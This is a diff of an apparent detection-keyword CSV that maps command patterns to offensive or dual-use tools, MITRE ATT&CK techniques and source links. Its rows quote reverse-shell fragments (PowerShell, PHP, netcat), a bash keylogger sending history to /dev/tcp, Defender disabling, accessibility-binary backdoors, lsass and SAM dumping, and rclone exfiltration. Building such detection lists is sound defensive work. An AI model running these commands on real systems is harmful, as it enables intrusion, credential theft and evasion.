0..65535*","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*New-Object System.Net.Sockets.TCPClient(*$stream = $client.GetStream()*[byte[]]$bytes = 0..65535*","greyware_tool_keyword","powershell","Powershell reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ngrok tcp *","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*nhfjkakglbnnpkpldhjmpmmfefifedcj*","greyware_tool_keyword","Pron VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" @@ -775,7 +815,7 @@ "*nltest /all_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nltest /dclist*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nltest /domain_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" -"*nmap -*","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8299","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"*nmap -*","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" "*nmap * --script=*.nse*","greyware_tool_keyword","nmap","check exploit for CVEs with nmap","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation Tools","https://nmap.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*nmap -Pn -v -sS -F*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*nmap-*-setup.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -812,20 +852,20 @@ "*PhoenixMiner.exe*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PhoenixMiner_*_Windows\*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*ping -n 10 localhost > nul*","greyware_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*pip* install updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*ping -n 10 localhost > nul*","greyware_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*pip* install updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" "*pktmon start*","greyware_tool_keyword","pktmon","pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*plpmggfglncceinmilojdkiijhmajkjh*","greyware_tool_keyword","Red Panda VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*poeojclicodamonabcabmapamjkkmnnk*","greyware_tool_keyword","HMA VPN Proxy Unblocker","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*pooljnboifbodgifngpppfklhifechoe*","greyware_tool_keyword","GeoProxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*poor buffer accounting in str_netfd_alloc*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*port and pasv both active*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" -"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*","greyware_tool_keyword","powershell","Windows Defender tampering technique ","T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*","greyware_tool_keyword","powershell","Adversaries may attempt to execute powershell script from known accessible location","T1059.001 - T1036 - T1216","TA0002 - TA0006","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*powershell.exe -exec bypass -noni -nop -w 1 -C*","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","High risk of false positive","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*powershell.exe -noni -nop -w 1 -enc *","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","High risk of false positive","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*powershell.exe -exec bypass -noni -nop -w 1 -C*","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*powershell.exe -noni -nop -w 1 -enc *","greyware_tool_keyword","powershell","command pattern used by crackmapexec by default A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","High risk of false positive","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*ppajinakbfocjfnijggfndbdmjggcmde*","greyware_tool_keyword","My Browser Vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*procdump*lsass*","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","N/A","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*processhacker-*-sdk.zip*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" @@ -834,7 +874,7 @@ "*ProcessHacker.exe*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*ProcessHacker.sln*","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0040 - TA0006 - TA0009","N/A","N/A","Credential Access - Persistence - Defense Evasion","https://processhacker.sourceforge.io/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*PROMPT_COMMAND=*history -a* tail *.bash_history > /dev/tcp/127.0.0.1/*","greyware_tool_keyword","bash","Bash Keylogger","T1059 - T1003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*PSBits*NetShRun*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*PSBits*NetShRun*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*psc4re/NSE-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*PsExec[1].exe*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*PsExec64*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -942,10 +982,10 @@ "*raw.githubusercontent.com*.xlm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.xlsm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*raw.githubusercontent.com*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*rclone copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" -"*rclone.exe config create remote mega user *","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" -"*rclone.exe* copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" -"*rclone.exe* -l * *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","interactive mode","6","10","40569","3714","2023-10-03T18:57:28Z","2014-03-16T16:19:57Z" +"*rclone copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe config create remote mega user *","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe* copy *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","N/A","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" +"*rclone.exe* -l * *:*","greyware_tool_keyword","rclone","rclone abused by threat actors for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/rclone/rclone","1","0","interactive mode","6","10","40586","3718","2023-10-04T20:39:19Z","2014-03-16T16:19:57Z" "*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*","greyware_tool_keyword","reg","Allowing remote connections to this computer","T1021.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","7","7","N/A","N/A","N/A","N/A" "*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" @@ -964,7 +1004,7 @@ "*reg query hkcu\software\*\putty\session*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*","greyware_tool_keyword","reg","Check if LSASS is running in PPL","T1012 - T1003.003","TA0009 - TA0006","N/A","N/A","Reconnaissance","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*reg query hklm\software\OpenSSH*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\OpenSSH\Agent*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\realvnc*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" @@ -984,21 +1024,21 @@ "*reg save hklm\system system*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*remiflavien1/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*ren C:\Windows\System32\amsi.dll *.dll","greyware_tool_keyword","ren","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A" -"*rm .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*rm /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*rm /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*rm -f backpipe* mknod /tmp/backpipe p && nc *","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" -"*rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the 